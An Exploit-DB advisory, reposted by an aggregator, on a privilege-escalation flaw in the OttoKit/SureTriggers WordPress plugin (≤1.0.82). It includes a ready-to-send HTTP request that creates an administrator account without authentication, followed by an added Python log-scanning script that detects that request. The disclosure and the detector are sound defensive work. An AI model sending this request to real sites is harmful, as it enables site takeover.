[webapps] SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation
The article discloses a privilege-escalation vulnerability in SureTriggers OttoKit plugin versions ≤ 1.0.82. When the plugin is uninitialized and the target site exposes a specific REST API endpoint, an attacker can exploit it to create a new account with administrator privileges. 2025-5-9 00:0:0 Author: www.exploit-db.com

# Exploit Title: SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation
# Date: 2025-05-7
# Exploit Author: Abdualhadi Khalifa (https://x.com/absholi7ly/)

# Affected Versions: All versions of OttoKit (SureTriggers) ≤ 1.0.82.

Conditions for Exploitation
<https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit/#conditions-for-exploitation>

The vulnerability can be exploited under the following circumstances:

1. OttoKit must be installed and activated on the target WordPress site.
2. The plugin is *uninitialized* (e.g., no API key or "secret_key" has been
   set in the database).
3. The target site exposes the REST API endpoint
   '/wp-json/sure-triggers/v1/automation/action'.

------------------------------
HTTP Request
<https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit/#http-request>
The following request targets the
/wp-json/sure-triggers/v1/automation/action endpoint to create an
administrator account:

POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization:
Content-Length: [length]

selected_options[user_name]=new_admin&selected_options[user_email]=[email protected]&selected_options[password]=StrongP@ssw0rd123&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists
            
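A defender-side check for this request pattern, added here as an example and not part of the advisory or the plugin: it classifies constructed proxy/WAF log records (a hypothetical one-JSON-object-per-line format that captures method, path, headers and form body) and treats a POST to the endpoint above with an empty St-Authorization header, type_event=create_user_if_not_exists and role=administrator as an exploitation attempt.

```python
"""Detection for the CVE-2025-27007 request pattern (OttoKit/SureTriggers
<= 1.0.82) over constructed proxy log records. Added example, not code from
the advisory or the plugin."""
import json
from urllib.parse import parse_qs

TARGET_PATH = "/wp-json/sure-triggers/v1/automation/action"

# Constructed sample: a reverse proxy/WAF that logs each request as one JSON
# line with method, path, headers and the raw form body (hypothetical format).
SAMPLE_LOG = """\
{"method": "GET", "path": "/wp-json/wp/v2/posts", "headers": {}, "body": ""}
{"method": "POST", "path": "/wp-json/sure-triggers/v1/automation/action", "headers": {"St-Authorization": ""}, "body": "selected_options[user_name]=new_admin&selected_options[role]=administrator&type_event=create_user_if_not_exists"}
{"method": "POST", "path": "/wp-json/sure-triggers/v1/automation/action", "headers": {"St-Authorization": "PLACEHOLDER_VALID_KEY"}, "body": "selected_options[user_name]=editor1&selected_options[role]=editor&type_event=create_user_if_not_exists"}
not json at all
"""


def classify(record):
    """Return a verdict for one parsed record, or None if it is not a POST
    to the OttoKit automation endpoint."""
    if record.get("method") != "POST" or record.get("path") != TARGET_PATH:
        return None
    # HTTP header names are case-insensitive; normalise before lookup.
    headers = {k.lower(): v for k, v in record.get("headers", {}).items()}
    # Precondition of the bug: the endpoint is called with no usable key.
    unauthenticated = not headers.get("st-authorization", "").strip()
    params = parse_qs(record.get("body", ""))
    creates_user = params.get("type_event") == ["create_user_if_not_exists"]
    admin_role = params.get("selected_options[role]") == ["administrator"]
    if unauthenticated and creates_user and admin_role:
        return "exploit-attempt: unauthenticated admin account creation"
    if unauthenticated:
        return "suspicious: automation endpoint called without St-Authorization"
    return "authenticated-automation"  # expected use of an initialised plugin


def scan(log_text):
    """Return (line_no, verdict) for every alert-worthy line; lines that are
    not JSON are skipped instead of aborting the scan."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue
        verdict = classify(record)
        if verdict and verdict != "authenticated-automation":
            findings.append((line_no, verdict))
    return findings


if __name__ == "__main__":
    for line_no, verdict in scan(SAMPLE_LOG):
        print(f"line {line_no}: {verdict}")
```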

Source: https://www.exploit-db.com/exploits/52286
For copyright concerns, contact: admin#unsafe.sh